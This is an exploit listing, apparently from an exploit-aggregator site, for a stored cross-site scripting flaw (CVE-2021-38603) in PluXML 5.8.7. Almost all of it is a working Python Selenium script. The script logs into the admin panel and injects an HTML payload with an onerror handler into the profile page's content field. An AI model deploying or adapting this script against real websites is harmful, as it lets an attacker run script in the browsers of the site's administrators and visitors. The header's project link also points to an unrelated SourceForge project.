Exploit for PluXML 5.8.7 Cross Site Scripting CVE-2021-38603

Name: Exploit for PluXML 5.8.7 Cross Site Scripting CVE-2021-38603
Rating: 5 (191 reviews)
2021-08-13 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:163823
# Exploit Title: XSS-Stored on PluXML 5.8.7 - latest parameter "id_content"  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 08.13.2021  
# Vendor: https://pluxml.org/  
# Link: https://sourceforge.net/projects/chikitsa/  
# CVE: CVE-2021-38603  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: @nu11secur1ty  
# CVE-2021-38603  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="  
http://192.168.1.120/PluXml/core/admin/auth.php?p=/PluXml/core/admin/"  
  
#enter your login username  
username="nu11"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="login"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="blue"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_class_name(element_for_submit)  
signInButton.click()  
  
## Vulnerability parameter in profil.php "id_content"  
## NOTE: The same problem is in the demo account in the online version  
## https://www.softaculous.com/softaculous/demos/PluXml  
time.sleep(3)  
browser.maximize_window()  
browser.get(("http://192.168.1.120/PluXml/core/admin/profil.php"))  
  
  
## The Exploit  
browser.execute_script("document.querySelector('[name=\"content\"]').value=\"</span><img  
src=  
https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif  
<a href=http://example.com/> onerror=alert(1) /><span>\"")  
  
## submit the exploit  
browser.execute_script("document.querySelector('[name=\"profil\"]').click()")  
  
# exit if you want :D  
browser.close()  
  
print("The payload for CVE CVE-2021-38603 is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38603  
# Proof: https://streamable.com/5rf36u  
# BR nu11secur1ty